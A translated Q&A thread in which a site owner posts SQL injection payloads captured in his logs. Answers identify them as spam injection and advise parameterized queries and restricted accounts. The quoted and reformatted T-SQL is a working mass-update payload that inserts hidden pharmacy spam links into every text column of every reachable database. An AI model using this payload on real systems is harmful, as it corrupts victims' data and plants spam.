1. 首頁
  2. 問答
  3. 有人試圖破解我的網站

有人試圖破解我的網站

2016-04-13 82 views
2

我趕上了以下異常在我的日誌:有人試圖破解我的網站

mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2&lt

黑客在開始的那一刻;申報並完成的 - 。我所有的Sql查詢都應該被參數化,但如果沒有,我需要消除這種威脅。

我最好的選擇是什麼?我有一個特定的「網絡」登錄帳戶的數據庫。最小化此Web登錄帳戶憑據或拒絕特定的SQL對象的最佳做法是什麼?

這個人想要做什麼?這裏是另一個黑客企圖:

;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '[email protected]+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a 
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br

這裏是我的日誌的快照。如果你從底部到頂部看,你可以看到這個黑客正在嘗試每個參數來注入他的代碼。

enter image description here

來源

2016-04-13 kstubs

+0

確實很簡單:確保您爲這個確切原因對SQL查詢進行參數化。創建一個只能訪問特定數據庫(或數據庫)的用戶帳戶。安裝SQL Server的服務器只拒絕來自指定IP地址的任何連接。 –

+0

獲取過程。你是否在vpn上,有時是在通過服務器爬取進行備份時 – hemanjosko

+0

OWASP基金會有你需要知道的一切:https://www.owasp.org/index.php/Category:OWASP_Guide_Project –

回答

1

開始封鎖IP的將啓動,並確保所有的輸入被轉義等的地方。如果一切正常逃脫,我的意思是使用任何數據庫的建議,而不是一個正則表達式你計算器發現:) SQL注入的可能性很小。

確保他們所做的並不是攻擊第三方庫,也就是說他們可能不是您的代碼,他們正在攻擊它可能是針對您正在使用的通用庫的已知漏洞。

如果SQL注入不會發生,他們可能會嘗試DOS/DDOS或其他下一個其他的東西來破壞您的網站。大多數網站可以做的,以減輕嚴重的DDOS嘗試,但如果你開始阻止IP的黑客可能會很快意識到,沒有水果,她正在尋找並繼續前進。

我假設訪問後端系統是在VPN安全即體面的密碼策略等

來源

2016-04-13 05:39:08 Harry

4

至於對方表示,使用參數化的SQL查詢。

這裏是格式化的SQL:

DECLARE @b CURSOR; 
DECLARE @s VARCHAR(8000); 
DECLARE @w VARCHAR(99); 

SET @b=CURSOR 
FOR SELECT Db_name() 
    UNION 
    SELECT NAME 
    FROM sys.databases 
    WHERE (Has_dbaccess(NAME) != 0) 
      AND NAME NOT IN ('master', 'tempdb', 'model', 'msdb', Db_name()); 

OPEN @b; 

FETCH next FROM @b INTO @w; 

WHILE @@FETCH_STATUS = 0 
    BEGIN 
     SET @s='begin try use ' + @w 
      + 
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch' 
    ; 

    EXEC (@s); 

    FETCH next FROM @b INTO @w; 
END; 

CLOSE @b--<br/> sess: 2<

和內查詢:

; 
DECLARE @c 
CURSOR;DECLARE @d VARCHAR(4000);SET @c= 
    CURSOR FOR 
    SELECT ''UPDATE [''+TABLE_NAME+''] 
    SET [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+ 
      CASE Abs(Checksum(Newid()))%10 
        WHEN 0 THEN ''''''+Char(60)+''div style=&quot;DISPLAY:none&quot;''  +char(62)+''inderal 10mg ''+char(60)+''a href=&quot;HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill&quot;''  +char(62)+''''''+ 
      CASE abs(checksum(newid()))%3 
      WHEN 0 THEN 
      ''''blog.coepd.com'''' 
      WHEN 1 THEN 
      ''''blog.coepd.com'''' 
      ELSE ''''blog.coepd.com'''' 
      END 
      +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' 
      ELSE '''''''' 
     END 
     '' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
      indid IN (0, 
        1) 
     ) 
     AND 
     data_type LIKE ''%varchar'' 
     AND 
     ( 
      character_maximum_length IN (2147483647, 
             -1) 
     );OPEN @c;FETCH next 
     FROM @c 
     INTO @d;WHILE @@FETCH_STATUS=0 
     BEGIN 
      EXEC (@d); 
      FETCH next 
      FROM @c 
      INTO @d; 

     END;CLOSE @c 
     end tryBEGIN catch 
     END catch

他們基本上是試圖更新所有數據庫和表中的所有文本列。

所以這只是一個垃圾郵件腳本,試圖宣傳一些神奇藥丸。

來源

2016-04-13 06:21:31 jgauffin

相關問題

 相關問題